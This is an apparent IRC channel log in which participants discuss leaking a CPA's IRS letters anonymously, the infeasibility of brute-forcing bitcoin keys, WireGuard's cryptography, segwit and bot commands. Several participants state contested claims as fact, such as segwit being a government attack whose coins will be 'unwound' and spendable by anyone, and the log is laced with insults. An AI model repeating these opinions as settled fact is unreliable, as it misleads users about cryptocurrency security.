1795953;1523416833;ckang;was it published anywhere yet? 1795954;1523416846;ckang;if not i can see if he will scan it 1795955;1523416868;mircea_popescu;illegal as all fuck, but then again http://btcbase.org/log/2018-04-09#1794697 and all that. 1795956;1523416868;a111;Logged on 2018-04-09 15:42 mircea_popescu: asciilifeform there was also that hellvig lawsuit (which afaik went exactly the same place all other "rule of law" challenges to notes-from-stalin ever went) 1795957;1523416878;mircea_popescu;usg has laws in the sense any bully has principles. 1795958;1523416902;mircea_popescu;ckang have him scan it ; qntra will want to publish it, if you don't break down and make a proper blog before that. 1795959;1523416919;mircea_popescu;(do make a blog. it's an immensely important anchor for your online identity and the power you build on it) 1795960;1523416931;ckang; but to beat a bully you need to be on a more level field 1795961;1523416939;mircea_popescu;not really. 1795962;1523416957;ckang;well he said he would be down to do it but he wanted to make sure it went to other CPAs also 1795963;1523416958;mircea_popescu;"god doesn't beat with the stick". 1795964;1523416972;ckang;so it cant be traced back to his firm if that makes sense 1795965;1523416991;ckang;ill ask him next time i see him though 1795966;1523417193;asciilifeform;mircea_popescu: pretty sure this is in full alignment with current paper usg.law -- recall, they stripped away immunities from shrinks, priests, wives, etc. why not also cpa. 1795967;1523417201;mircea_popescu;ckang if he wants to come online i can explain to him how to publish it so it is not traceable in that way. see also http://btcbase.org/log/2017-08-29#1704530 1795968;1523417201;a111;Logged on 2017-08-29 01:02 mircea_popescu: BingoBoingo do we have the famous pdf unicorn-coconut or whatever took to the inept competition instead of bringing to qntra, resulting in a jail term for her ? 1795969;1523417228;mircea_popescu;back when some imbecile went to fake news media rather than coming to qntra, got sent to jail for it, STILL did not admit there exists no media online besides qntra. 1795970;1523417238;mircea_popescu;asciilifeform certainly. 1795971;1523417294;ckang;mircea_popescu: yea hes a sharp guy but i dont want to pressure him into anything uncomfortable, him mentioning it though was the first i heard of these letters being mass mailed 1795972;1523417296;mircea_popescu;it's still on my fucking liver, that episode. so whistleblower goes to "media", they publish her fucking pdfs with the yellow dots untouched, she gets sent to jail, at which point the ENTIRE fucking faux establishment somehow still does not end. how thje fuck! 1795973;1523417301;mircea_popescu;ckang sure. 1795974;1523417339;ckang;im sure places like coinbase are going to be the the more important things they would worry about 1795975;1523417358;ckang;who would tell their cpa about crypto holdings anyways lol 1795976;1523417382;mircea_popescu;hey, i moved enough paper money into argentina to ruin its government a few years ago. they can worry until they fucking fall over for all the good it's gonna do them. 1795977;1523417396;mircea_popescu;for all practical purposes money is now outside of the control of fiat pretend-sovereigns. 1795978;1523417501;ckang;yea, curious how much loss of wealth will be reported this year sorta 1795979;1523417511;mircea_popescu;reporting is not an imperial strength. 1795980;1523417512;ckang;the folks that refinanced their houses at 19k 1795981;1523417518;mircea_popescu;did they manage to get a budget yet ? 1795982;1523417519;ckang;and decided to go all in 1795983;1523417562;ckang;probably not super common but theres stories of it i see popping up here and there 1795984;1523417571;mircea_popescu;ckang amusingly, selling us based real estate on the market and buying bitcoin at 20k is not actually a bad deal. even with bitcoin at 7k now. 1795985;1523417605;mircea_popescu;consider a simple example : you get divorced. or arrested. or "suspected" of "crime". what's the real estate you "owned" worth now ? 1795986;1523417620;mircea_popescu;because teh bitcoin ain't going anywhere, the "judge" can hold his breath until he's done dicking about. 1795987;1523417624;ckang;yea thats true, you can literally take it to your grave 1795988;1523417631;ckang;unlike anything else 1795989;1523417667;mircea_popescu;the fantasy the empire is living is that "nobody can be poor enough to starve". the only meaning of which is, "nobody can have any incentive to hold anything besides bitcoin". 1795990;1523417692;ckang;anything material has to be thrown out, sold, etc... 1795991;1523417703;mircea_popescu;quite a lulzy implementation of the whole "do not build yourself perishable treasures" meme. 1795992;1523417726;ckang;heh not familiar with that one 1795993;1523417738;mircea_popescu;really ? it's the cornerstone of "protestant" ideology. 1795994;1523417747;mircea_popescu;as in, the xtian sect. 1795995;1523417790;ckang;im not well read in theology by any means 1795996;1523417809;ckang;i just know that they are christian 1795997;1523417841;mircea_popescu;so you never heard of "Do not store up for yourselves treasures on earth, where moths and vermin destroy, and where thieves break in and steal." and all that ? 1795998;1523417898;mircea_popescu;it's a xtian thing, "gospel by matthew". here : https://www.biblegateway.com/passage/?search=Matthew+6%3A19-34&version=NIV 1795999;1523417909;ckang;ive mostly just lived under the "cant take it to the grave or regret it when dead" idea 1796000;1523417956;mircea_popescu;technically bitcoin you can't take to grave either, the passive result of dead keys is a slight increase in the value of circulating bitcoin. 1796001;1523417981;mircea_popescu;but whether this properly means you have taken it or you haven't taken it is very much an open question of metaphysics, "what is the meaning of taking". 1796002;1523417983;ckang;it would take too long to brute force it though 1796003;1523418000;ckang;or could rather 1796004;1523418022;ckang;has there been any studies done on that? 1796005;1523418033;mircea_popescu;ckang the idea isn't you bruteforce it, the idea is that in between world A, where 100 people living have 1 btc each, and world A', where 99 people living and 1 person dead have 1 bitcoin each, is that the apparent value of the bitcoin will be 101% in A` vs A. 1796006;1523418058;mircea_popescu;but no, you're not going to bruteforce a key. 1796007;1523418090;ckang;hmm yea, true, didnt think about it from that angle 1796008;1523418105;ckang;i mean with enough clockcycles anything can be brute forced 1796009;1523418113;ckang;its just on what timescale 1796010;1523418121;ckang;and cost:reward 1796011;1523418154;mircea_popescu;ckang the timescale involved in bruteforcing a bitcoin address exceeds the computable capacity of an alternate universe in which every single atom extant would be part of an ideal processor working at it. 1796012;1523418174;mircea_popescu;in other words : it will never happen, the world ends first. 1796013;1523418176;mircea_popescu;http://btcbase.org/log/2018-04-11#1795922 << this is broken in the same way as the subjects of http://btcbase.org/log/2018-04-03#1792556 discussion. 1796014;1523418176;a111;Logged on 2018-04-11 01:20 lobbes: speed of implementation really (I got other tmsr irons in fire). I figured I could get a tickerbot up and running quicker just using a gribble instance >> http://btcbase.org/log/2018-04-10#1795728 1796015;1523418176;a111;Logged on 2018-04-03 18:39 mircea_popescu: lobbes the only important consideration here is that design is not a haphazard activity driven by occurence and circumstance. that's implementation. design is a deductive activity, it proceeds from first principles and does not break faith. 1796016;1523418179;ckang;yea thats why i was just wondering if anyone has done a paper about it ;) 1796017;1523418187;ckang;just thought it would be a fun read 1796018;1523418224;mircea_popescu;ckang it's one of the things people do for their own satisfaction, but your question isn't without marrow. let's see here... 1796019;1523418225;ckang;the scaling comparisons i like for some reason 1796020;1523418237;ckang;like you can fit X somethings in a Y 1796021;1523418274;ckang;that just show the magnitude of something 1796022;1523418371;mircea_popescu;ckang here's the basic likbez : a bitcoin address (which is what keeps funds) is built out of a chaining of crypto functions : https://en.bitcoin.it/w/images/en/thumb/4/48/Address_map.jpg/700px-Address_map.jpg 1796023;1523418419;ckang;oh wow, ive never seen it broken down like that 1796024;1523418462;asciilifeform;1 caveat re 'brute force needs machine the size of 10^bignum universes running for 10^biggernum yrs' is that it presumes a flat keyspace. whereas if instead you can exclude large chunks ( because, e.g., winblowz rng is known to never output'em , or some other likewise ) ... 1796025;1523418467;ckang;i didnd even know base58 was a thing 1796026;1523418470;ckang;didnt* 1796027;1523418535;mircea_popescu;the proper formula is : address = ripemd160(sha256(secret)). to go from an address to its corresponding private key (which is what "bruteforce" requires in this context) you'd have to reverse a ripemd160 and a sha256 op. 1796028;1523418664;ckang;sounds like a good research paper for some mathematics major ;) 1796029;1523418677;ckang;thesis or something 1796030;1523418793;mircea_popescu;admitting the merkle-damgard construction (what ripemd is built out of, see http://homes.esat.kuleuven.be/~bosselae/ripemd160.html ) does not have a backdoor, and that sha256 doesn't have a backdoor, you are looking at something like 256 bits of entropy involved. 1796031;1523418808;mircea_popescu;there's also some ecdsa involved, but that's cryptographically less valuable. 1796032;1523418874;mircea_popescu;but, for the expert minds tuned in : ckang 's question does not, as we currently stand, have a published canonical answer i can link him to. if you write it, i will link it next time someone asks. 1796033;1523419301;mircea_popescu;ckang for an ad-hoc illustration : admitting that you own sunway taihulight (the chinese supercomputer discussed in http://trilema.com/2017/resplenduminous/ ), which does something like 9.3 * 10^16 flops ; and admitting you take 1 flop to generate a key (it's more like 150-200 irl, but w/e) and 0 time to check for its correctness, then you could expect a correct guess about once every 51948826585749897379957793229925273575140 1796034;1523419301;mircea_popescu;14 years of non-stop functioning. 1796035;1523419351;mircea_popescu;this is roughly speaking 376440772360506502753317342245835 times the age of our present universe (the big bang having taken place 13.8 or so billion years ago). 1796036;1523419443;ckang;hah, yea thats hard to comprehend 1796037;1523419495;mircea_popescu;in any case -- it's currently cheaper to mine it. 1796038;1523419524;ckang;sorta related, but what do you think about this.. https://www.wireguard.com/papers/wireguard-formal-verification.pdf 1796039;1523419531;ckang;stateless VPN 1796040;1523419545;mircea_popescu;(which goes back to a long held asciilifeform notion, of "mining is a bug" -- certainly, but looky here : mining is also the direct result of "i want a shunt for the bruteforce, so i can say to people, "x is cheaper therefore y won't happen") 1796041;1523419555;mircea_popescu;ckang i don't read pdfs. 1796042;1523419567;ckang;that can use any openssl algorithm, I believe.. 1796043;1523419570;ckang;https://www.wireguard.com/formal-verification/ 1796044;1523419597;ckang;the pdf goes a lot deeper but there some info on the site 1796045;1523419620;mircea_popescu;!#s formal verification 1796046;1523419620;a111;12 results for "formal verification", http://btcbase.org/log-search?q=formal%20verification 1796047;1523419625;ckang;https://www.wireguard.com/protocol/ 1796048;1523419634;ckang;ah this, is what i was looking for 1796049;1523419652;mircea_popescu;the fundamental problem with formal verification is that it's not currently implemented seriously (which is to say -- completely, on small codebases). it's just machines poking at things generally, in an untenable theoretical model. 1796050;1523419660;mircea_popescu;consequently, as a broad field, it doesn't hold much interest here. 1796051;1523419703;ckang;its pretty interesting though if you need such a thing 1796052;1523419711;ckang;4000 LOC (not including openssl) 1796053;1523419724;mircea_popescu;i'ma have to get back to you on this. 1796054;1523419751;ckang;sure was just curious since it was crypto related and you guys seem to know your stuff there 1796055;1523419772;mircea_popescu;o look, there's even a #wireguard 1796056;1523419794;ckang;ive been using it for some time and its been super solid, i just didnt know how strong it was from the cryptography side of things 1796057;1523419795;mircea_popescu;i dun know anyone uses it as it is. 1796058;1523419821;ckang;ive pushed 2TB though a tunnel before i rebooted the router for updates 1796059;1523419834;ckang;through* 1796060;1523419848;mircea_popescu;the claim is "The following protocols and primitives are used: ChaCha20 for symmetric encryption, authenticated with Poly1305, using RFC7539's AEAD construction; Curve25519 for ECDH; BLAKE2s for hashing and keyed hashing, described in RFC7693; SipHash24 for hashtable keys; HKDF for key derivation, as described in RFC5869" 1796061;1523419887;ckang;that stuff to a layman like myself goes right over my head ;) 1796062;1523419907;ckang;https://www.wireguard.com/performance/ 1796063;1523419918;mircea_popescu;ckang you can read up on all the crypto functions, be they trapdoors or whatever, if you are interested. it's not illegible arcana. 1796064;1523419932;ckang;this is what got me interested, can push a ton more data and with less latency on the same hardware vs. openvpn 1796065;1523419954;ckang;by quite a bit 1796066;1523420015;ckang;theres mesh capability but ive not delved into that much yet 1796067;1523420216;mircea_popescu;" (on #wireguard) zx2c4 (the owner, j. donenfeld) : if you're willing to set two hours apart on any day of your choosing to answer wireguard questions on #trilema, i'm willing to donate 1 btc to your project. let me know, i'm usually on freenode (this nick). thanks & gl." << asciilifeform spyked whoever else might care. 1796068;1523420234;ckang;yea, thats awesome, hopefully he takes you up on that 1796069;1523420252;mircea_popescu;ckang you know the ancient story of how openbsd got saved from death ? it was eerily similar. 1796070;1523420275;ckang;the project has a lot of potential, its just not well known so providers arent selling it to the general masses 1796071;1523420344;mircea_popescu;i guess. on a superficial look it's certainly better than whatever tls bs. 1796072;1523420358;ckang;mullvad does offer it and its pretty good through them, I lose about 2Mbit off my top end and and only gain 2ms when pinging 'google.com' (hard to do this test since geography and routing) 1796073;1523420362;mircea_popescu;ckang feel free to idle there, smooth things over if need be. 1796074;1523420390;ckang;sure thing yea, didn't think to check if they had a channel before 1796075;1523420569;*;mircea_popescu has finished eating logs. muahaha. 1796076;1523421472;asciilifeform;http://btcbase.org/log/2018-04-11#1796043 << i read. it's a hannoboeckization of gossipd. 1796077;1523421472;a111;Logged on 2018-04-11 04:06 ckang: https://www.wireguard.com/formal-verification/ 1796078;1523421564;asciilifeform;with generous helpings of c pointerolade, opensslism, mathemadturbatorily- squigglymarked pdfolade, tall claims of 'formal verification', etc 1796079;1523421672;asciilifeform;http://btcbase.org/log/2018-04-11#1796064 << naturally fast -- uses post-betrayal bernsteinian cryptosnakeoil, instead of old-fashioned nsa-inhouse snakeoil 1796080;1523421672;a111;Logged on 2018-04-11 04:12 ckang: this is what got me interested, can push a ton more data and with less latency on the same hardware vs. openvpn 1796081;1523421683;asciilifeform;( e.g. chacha ) 1796082;1523421769;asciilifeform;http://btcbase.org/log/2018-04-11#1796063 << the most important documents are ~not there~ for him to read : i.e. the wholly-absent proofs of strength for any of the symmetric poppycock 1796083;1523421769;a111;Logged on 2018-04-11 04:11 mircea_popescu: ckang you can read up on all the crypto functions, be they trapdoors or whatever, if you are interested. it's not illegible arcana. 1796084;1523421798;ckang;can you summarize that down to: 'it sucks' 'indifferent' 'has a future' ;) 1796085;1523421808;mircea_popescu;asciilifeform i know, but prepare a list of q's for when/if the guy shows up. 1796086;1523421822;mircea_popescu;and do me a favour -- not in this lambasting tone! 1796087;1523421836;ckang;im not sure how to interpret what you are saying without knowing your opinions on those topics 1796088;1523421849;asciilifeform;http://btcbase.org/log/2018-04-11#1796071 << it is 'better' in same sense as ethereum 'better than' paypal. 1796089;1523421849;a111;Logged on 2018-04-11 04:19 mircea_popescu: i guess. on a superficial look it's certainly better than whatever tls bs. 1796090;1523421850;mircea_popescu;ckang too soon for you to interpret anything 1796091;1523421864;mircea_popescu;there's a process we go through here, first the engineers throw a fit, then i pick up the pieces. 1796092;1523421937;ckang;it is 'better' in same sense as ethereum 'better than' paypal <- so its slightly better than the worst? ;) 1796093;1523421951;mircea_popescu;"unprincipledly better" is the argument. 1796094;1523422023;ckang;im hoping he finds the resources to get an iOS client done 1796095;1523422027;asciilifeform;ckang: disinformation is not always a set of empty words; often can be a working mechanism, with moving parts, superficially correct 1796096;1523422034;ckang;for mobile applications this stuff makes a lot more sense 1796097;1523422042;mircea_popescu;why for mobile specifically ? 1796098;1523422044;ckang;battery life and data wise 1796099;1523422056;asciilifeform;aimed to displace and erase an actual honest item 1796100;1523422058;mircea_popescu;ah, uses less amps per bit ? i guess. 1796101;1523422078;ckang;you dont need a continuous connection 1796102;1523422080;mircea_popescu;asciilifeform you mean gossipd ? how can it possibly displace something that doesn't even exist! 1796103;1523422085;asciilifeform;easily, 1796104;1523422095;asciilifeform;like-that. 1796105;1523422100;mircea_popescu;like what ? 1796106;1523422119;ckang;you can hop between various towers or APs seamlessly without re-authenticating 1796107;1523422126;ckang;which takes a bit of time on openvpn 1796108;1523422183;ckang;so assuming the applications timeout is set appropriately, its like what mosh is to ssh (wireguard to openvpn) 1796109;1523422246;asciilifeform;mircea_popescu: the displacement takes place in the imagination of the usg chair warmers, naturally. 'we'll cook up this boeckian substitute, no one will have any curiosity re the real thing, when it deigns to show up' being the idea. 1796110;1523422280;mircea_popescu;the only important question in computing is what i end up using anyway. to that standard, what difference could it possibly make. 1796111;1523422298;ckang;https://streamable.com/am04x heres short screencapture 1796112;1523422313;ckang;showing how quickly it will close one tunnel and open up another 1796113;1523422342;ckang;its faster than watch's 1s updates 1796114;1523422372;asciilifeform;!#s single packet 1796115;1523422372;a111;28 results for "single packet", http://btcbase.org/log-search?q=single%20packet 1796116;1523422393;asciilifeform;ckang: see ^ logs. 1796117;1523422455;asciilifeform;no martian tech needed, stateless routing is basic sanity 1796118;1523422485;ckang;yea but its nice to see in a working product that i can use now 1796119;1523422499;ckang;its much lighter such that it can even be run on ARM routers 1796120;1523422507;ckang;and not have super terrible performance 1796121;1523422527;asciilifeform;def of 'working' in re a ciphrator, is tricky question 1796122;1523422545;asciilifeform;e.g., rot13 -- 'works, is fast' 1796123;1523422596;ckang;oh theres an interesting read regarding its security flaw, operators. https://lists.zx2c4.com/pipermail/wireguard/2017-November/001969.html 1796124;1523422682;asciilifeform;ckang: this makes 0 sense as 'flaw' 1796125;1523422692;ckang;its not a 'flaw' 1796126;1523422700;ckang;but rather a concern people had 1796127;1523422726;ckang;there hasnt really been anything major in terms of flaws I could find. 1796128;1523422738;ckang;but that could be because theres not large adoption of it 1796129;1523422775;ckang;i just thought it was interesting for them to code protection in for such things 1796130;1523422792;asciilifeform;adoption can reveal presence of flaws, but not absence (tm)(r) 1796131;1523422803;ckang;it increases the surface area 1796132;1523422810;mircea_popescu;"It turns out that this strength might actually be a weakness for some. A small commercial VPN provider approached me recently about the fact they could see the allowed IPs mapping easily with WireGuard, whereas with OpenVPN it was hidden deep inside a process they didn't know how to debug. "Great," I thought. Not so fast. They were concerned that when compelled to retrieve this kind of information, they would no longer be ab 1796133;1523422810;mircea_popescu;le to claim, "we don't know how," since WireGuard makes it so easy. So, they hired me for a day to develop and open source a small solution for their unique use case and odd scenario." for lulz. 1796134;1523422814;ckang;and entropy of someone find it 1796135;1523422838;asciilifeform;ckang: this is a fundamentally african approach. 1796136;1523422891;ckang;if you are a security researcher would your time be better spent on something that 1 person uses or 100million people use? 1796137;1523422927;ckang;im talking about it from that perspective 1796138;1523422971;ckang;which is also a blessing because the government probably hasn't researched how to break it either 1796139;1523422995;mircea_popescu;ckang why do you expect the usercount makes a difference ? 1796140;1523423018;ckang;mircea_popescu: it doesnt really in how secure something is 1796141;1523423025;mircea_popescu;generally, more thought is given to the design of airplane cockpits than of women's shoes, notwithstanding more women wear shoes than fly airplanes. 1796142;1523423030;ckang;but does in terms of how many eyes and fingers are trying to break it 1796143;1523423052;asciilifeform;ckang: a correct program stays correct after million yrs of 'research' by butthurt usg. an incorrect one -- is incorrect immediately, even if no one 'researched' 1796144;1523423068;ckang;and with enough resources and time (similar to the brute-forcing), anything can come up 1796145;1523423090;mircea_popescu;the anything is not a correct symbol. it's an approximation, and it only holds up in domains of little interest. 1796146;1523423121;ckang;yea im not thinking in absolutes 1796147;1523423179;mircea_popescu;this expectation that "if i go out to clubs enough, eventually i'll meet guyneviere" is fundamentally broken -- the slut's dead. 1796148;1523423204;mircea_popescu;ain't nobody meeting her anywhere no mo. 1796149;1523423284;*;mircea_popescu adds "Gwenhwyfar ferch Ogrfan Gawr drwg yn fechan, gwaeth yn fawr." to the public record, now we even have welsh rhyming slang in here! 1796150;1523423382;deedbot;http://trilema.com/2018/front-page-woman/ << Trilema - Front Page Woman 1796151;1523424036;lobbes;I certainly wasn't planning on it being a long-term solution, but I see what you mean. Plus, if I'm burning time anyways on this I may as well just learn some lisp and use the trinquebot. Have an actual republican item out of the effort rather than another pile of stapled dildos >> http://btcbase.org/log/2018-04-11#1796013 1796152;1523424036;a111;Logged on 2018-04-11 03:42 mircea_popescu: http://btcbase.org/log/2018-04-11#1795922 << this is broken in the same way as the subjects of http://btcbase.org/log/2018-04-03#1792556 discussion. 1796153;1523425569;mircea_popescu;lobbes quite. 1796154;1523425922;ckang;!!up kittycollector 1796155;1523425923;deedbot;kittycollector voiced for 30 minutes. 1796156;1523425933;ckang;i have one if you are interested mircea_popescu 1796157;1523425954;kittycollector;Hey 1796158;1523426018;kittycollector;Quiet room 😌 1796159;1523426050;ckang;ya just wait around ill ping u if he comes back 1796160;1523426072;kittycollector;😎 1796161;1523426812;lobbes;!!v C2A2518901C3C94171AB952EFDDE5C7484FF9FBF648E6A737C91D009CEF1EC47 1796162;1523426819;deedbot;Invoiced ben_vulpes 0.0547 << Samsung 860 EVO 1TB 2.5 Inch SATA III Internal SSD (2018-04-11) 1796163;1523426834;lobbes;^ using vwap of 6826.05 from nanotube's gribble 1796164;1523426844;lobbes;!!v FA59360A7EF0C7AC5A3482E3325AC191ECAB223AC75715661699A7551035E23D 1796165;1523426845;deedbot;lobbes unrated shinohai. 1796166;1523426853;lobbes;^ que pasa contigo, shinohai? There's a way to step back gracefully that would preserve your solid reputation, but abandoning your post ain't that way. 1796167;1523426856;ckang;nice drive 1796168;1523426867;ckang;how are the 860s over the 850? 1796169;1523426906;lobbes;no idea! wasn't for me 1796170;1523426915;lobbes;sadly, all my ssds are non-samsung 1796171;1523426932;ckang;ah its pretty much the only brand ive stuck with 1796172;1523426941;lobbes;yeah, I've heard it is the best 1796173;1523426951;ckang;but in terms of reliablity i have had better luck with spinning rust 1796174;1523426957;ckang;hitachi HSGT 1796175;1523426966;ckang;ultrastars, bulletproof 1796176;1523427311;lobbes;that also lines up with what I've learned thus far: hdd - reliability, ssd - speed 1796177;1523427357;lobbes;ssd, for example, is pretty much necessary for trb nodes to not fall behind. 1796178;1523427448;mircea_popescu;heya kittycollector 1796179;1523427464;kittycollector;Hey 1796180;1523427474;mircea_popescu;you here for teh titwriting ? 1796181;1523427481;kittycollector;Yes sir 1796182;1523427483;mircea_popescu;f9a75060 1796183;1523427494;kittycollector;Thx, give me a minute 1796184;1523427536;mircea_popescu;sure. 1796185;1523427977;mircea_popescu;!!up kittycollector 1796186;1523427978;deedbot;kittycollector voiced for 30 minutes. 1796187;1523428127;mircea_popescu;!!up zezizezi 1796188;1523428128;deedbot;zezizezi voiced for 30 minutes. 1796189;1523428129;mircea_popescu;you about ? 1796190;1523433388;mircea_popescu;!!up avgjoe 1796191;1523433389;deedbot;avgjoe voiced for 30 minutes. 1796192;1523433395;mircea_popescu;who might you be ? 1796193;1523433430;avgjoe;interested in running trb 1796194;1523433460;mircea_popescu;a cool. trouble with it ? 1796195;1523433494;avgjoe;no, just concerns about investing time setup it and being able to use it in the future 1796196;1523433502;mircea_popescu;specifically ? 1796197;1523433514;avgjoe;bech32 addresses, how the node behave? 1796198;1523433540;mircea_popescu;ignores them. 1796199;1523433554;mircea_popescu;this is intentional and will not change. 1796200;1523433616;avgjoe;i suppose that is a noob question, but if someone send me btc from a bech32 address to my trb legacy address, does the node ignore the tx? 1796201;1523433623;mircea_popescu;no. 1796202;1523433687;avgjoe;so there will never be a double standard with "tier 1 bitcoins" stored in legacy addresses and tier 2 stored in bech addresses, correct? 1796203;1523433705;mircea_popescu;anyway, there's a lot for you to read wrt to why specifically segwit is a usg-driven attack against bitcoin, and not supported by the bitcoin foundation. perhaps the recent http://btcbase.org/log/2018-04-11#1795944 is a good starting point ; but generally the logs are your friends, search them. 1796204;1523433705;a111;Logged on 2018-04-11 03:17 mircea_popescu: http://btcbase.org/log/2018-04-11#1795919 << bitcoin addresses come in the form 1x, like say 1NwAjL6CwMHm5S9aeFfmop5VtqBA6aNJRT ; some dorks came up with an "extension". there are fundamental problems with their code, discussed in the logs, http://btcbase.org/log/2017-08-11#1697111 / http://btcbase.org/log/2017-08-11#1697118 1796205;1523433732;mircea_popescu;avgjoe there already is a double standard : 1address bitcoin are bitcoin ; everything else is usg-crap. 1796206;1523433750;mircea_popescu;do not expect time/effort invested in usg-crap will yield anyhthing but tears for you. 1796207;1523433765;mircea_popescu;all segwit coins are going to be eventually unwound. this is again intentional, and not likely to change. 1796208;1523433879;mircea_popescu;running trb offers a firm guarantee that you will have your coins perpetually. running the various usg-sponsored "i can't believe it's not bitcoin" margerine offers a firm guarantee that a) any time you spend with them will be wasted on a long enough timeline and b) any resources you spend with them will be worthless on a long enough timeline. so bear that in mind. 1796209;1523433889;mircea_popescu;and with this, ima be off to bed. laters. 1796210;1523433894;avgjoe;thanks for the segwit discussion, i have just looked in the logs for "bech32" and it outputs very little 1796211;1523433944;avgjoe;thanks for now 1796212;1523434065;avgjoe;About this message i've a concern: http://btcbase.org/log/2017-08-11#1697118 1796213;1523434065;a111;Logged on 2017-08-11 17:52 mircea_popescu: ben_vulpes the substantial weakness segwit adds to bitcoin chain security is that witout it, one needs the power to unwind the chain AND the keys of old txn to steal bitcoin. whereas with it, one only needs the hash power, as anyone can spend the segwit shit. 1796214;1523434296;avgjoe;Basically segwit it could be reprhased as the "i'm a good politician that will enforce the ---good--- policy but to enforce this i'll need to take some of your sovereignty (keys), but bear with me, hashrate is gonna protect you" 1796215;1523434337;avgjoe;sorry for the english, trying to understand if i'm getting the point correctly 1796216;1523441246;spyked;http://btcbase.org/log/2018-04-11#1796067 <-- grrr, I lack too many includes to engage in a proper discussion on this. and sifting through the papers puts me into a rabbit hole of deeper and deeper includes and, frustratingly, unresolved medicine tactics. and I've wandered through such rabbit holes for the last 4 years. 1796217;1523441246;a111;Logged on 2018-04-11 04:16 mircea_popescu: " (on #wireguard) zx2c4 (the owner, j. donenfeld) : if you're willing to set two hours apart on any day of your choosing to answer wireguard questions on #trilema, i'm willing to donate 1 btc to your project. let me know, i'm usually on freenode (this nick). thanks & gl." << asciilifeform spyked whoever else might care. 1796218;1523441640;spyked;anyway, I'd be happy to read a version of http://btcbase.org/log/2018-04-11#1796038 (or better yet, a blog post/series) that explicitly references or otherwise explains all the priors and provides an actual proof, not just "we model this in tamarin, gtfo, install it and read the proof it generates". I want to be able to find out precisely what "symbolic reasoning/analysis" means in their universe, wtf is a "message deduction theory" 1796219;1523441640;a111;Logged on 2018-04-11 04:05 ckang: sorta related, but what do you think about this.. https://www.wireguard.com/papers/wireguard-formal-verification.pdf 1796220;1523441646;spyked;etc. otherwise this all looks like word salad. 1796221;1523441700;spyked;!#s noise protocol 1796222;1523441700;a111;14 results for "noise protocol", http://btcbase.org/log-search?q=noise%20protocol 1796223;1523441707;spyked;^ also probably relevant discussion 1796224;1523443194;shinohai;http://btcbase.org/log/2018-04-11#1796166 <<< I think the time for grace has passed, and if it isn't clear enough already I won't be wasting anymore time participating in Republican affairs since obviously I have nothing else to contribute. I did, in fact, offer to help you add the gribble functions to your bot or share my version of the plugins (Which incidentally, don't require any of the stuff you 1796225;1523443194;a111;Logged on 2018-04-11 06:07 lobbes: ^ que pasa contigo, shinohai? There's a way to step back gracefully that would preserve your solid reputation, but abandoning your post ain't that way. 1796226;1523443196;shinohai;mentioned here: http://btcbase.org/log/2018-04-10#1795655). But if that, and things like http://btcbase.org/log/2018-04-10#1795655 are throwing you for such a loop, I don't imagine my plugins will help you at all. 1796227;1523443196;a111;Logged on 2018-04-10 19:00 lobbes: I attempted to slap a gribble instance up on pizarro shell last night, but hit a roadblock trying to get 'tcl' working locally (sqlite3 makefile, which gribble depends on, will not run without tcl apparently) 1796228;1523443210;shinohai;Espero que ahora si entiendes muy claro "Lo que esta pasando conmigo". 1796229;1523452711;mod6;Thanks for your patience with me this past year, #trilema. It's been a long one. 1796230;1523455699;asciilifeform;http://btcbase.org/log/2018-04-11#1796216 << that's because the 'field' is a rat's nest of deliberate, obscurantist claptrap. 'there is no there, there.' can burn considerably more than 4y, it is a bottomless pit -- a kind of mechanized astrology. 1796231;1523455699;a111;Logged on 2018-04-11 10:07 spyked: http://btcbase.org/log/2018-04-11#1796067 <-- grrr, I lack too many includes to engage in a proper discussion on this. and sifting through the papers puts me into a rabbit hole of deeper and deeper includes and, frustratingly, unresolved medicine tactics. and I've wandered through such rabbit holes for the last 4 years. 1796232;1523455744;asciilifeform;http://btcbase.org/log/2018-04-11#1796218 << if the usg claptrap scaffolding were removed, the whole thing would vanish, like a toy balloon with skin peeled away. there'd be no 'product'. 1796233;1523455744;a111;Logged on 2018-04-11 10:14 spyked: anyway, I'd be happy to read a version of http://btcbase.org/log/2018-04-11#1796038 (or better yet, a blog post/series) that explicitly references or otherwise explains all the priors and provides an actual proof, not just "we model this in tamarin, gtfo, install it and read the proof it generates". I want to be able to find out precisely what "symbolic reasoning/analysis" means in their universe, wtf is a "message deduction theory" 1796234;1523455928;asciilifeform;http://btcbase.org/log/2018-04-11#1796220 << that's because... it IS salad. with a perfume of 'proofiness' sprayed on , as described in e.g. http://www.loper-os.org/?p=1390 re urbitists 1796235;1523455928;a111;Logged on 2018-04-11 10:14 spyked: etc. otherwise this all looks like word salad. 1796236;1523456001;asciilifeform;the premier peddlers of this type of snake oil 'commercially' (i.e. fattened on lavish usg contracts) are the cryptol people. they've spawned, unsurprisingly, shoddy imitators. 1796237;1523456032;asciilifeform;!#s cryptol 1796238;1523456032;a111;8 results for "cryptol", http://btcbase.org/log-search?q=cryptol 1796239;1523456034;asciilifeform;^ see also. 1796240;1523456298;asciilifeform;i do not have anything against mechanized proof per se. but in practice it is in ~100% of published cases used as an attempted 'i can't believe it's not self-evident correctness!' margarinesque substitute for fits-in-head. 1796241;1523456707;spyked;aha. I would add that I for one would gladly read even informal, less rigorous proofs, provided they helped me understand the protocol and the underlying knowledge. also am ok with "this automated thing is the mobility aid we use for the brain, and it works this way"; (and ftr, I looked over the tamarin and got stuck "symbolic model" and other obscure terms). 1796242;1523456784;spyked;but as it is, I could only ask stupid questions such as "what's wrong with modelling this using petri nets". or any other simpler method. 1796243;1523456857;spyked;*got stuck at 1796244;1523457651;asciilifeform;spyked: the authors of these wonders, have very other goals in mind than to help you understand. quite the opposite. 1796245;1523457690;asciilifeform;i.e. 'magic haskell oracle pronounced that my proof is proofy-enuff. nao gimme tenure.' 1796246;1523457762;asciilifeform;spyked: prev. thread, incidentally, re 'noise protocol' : http://btcbase.org/log/2017-08-22#1701852 1796247;1523457762;a111;Logged on 2017-08-22 12:02 asciilifeform: the other lul in the 'noise protocol' is the use of symmetric ciphers 1796248;1523457775;asciilifeform;with special emphasis on http://btcbase.org/log/2017-08-22#1701858 . 1796249;1523457775;a111;Logged on 2017-08-22 12:07 asciilifeform: the 'noise protocol' link is hilarious -- even features the classic leper's bell of nsa committee , the null-cipher 1796250;1523457896;asciilifeform;http://btcbase.org/log/2018-04-11#1796228 << shinohai -- what's the plan, 'i'ma switch off my bot, they will see, will SEE, how necessary i was!11' or wat. 1796251;1523457896;a111;Logged on 2018-04-11 10:40 shinohai: Espero que ahora si entiendes muy claro "Lo que esta pasando conmigo". 1796252;1523458248;spyked;asciilifeform, indeed. I inevitably got reminded of the noise thread when stumbling upon: "WireGuard, the secure network tunnel, uses an interesting Diffie-Hellman authenticated key exchange protocol based on NoiseIK, [...]". so. 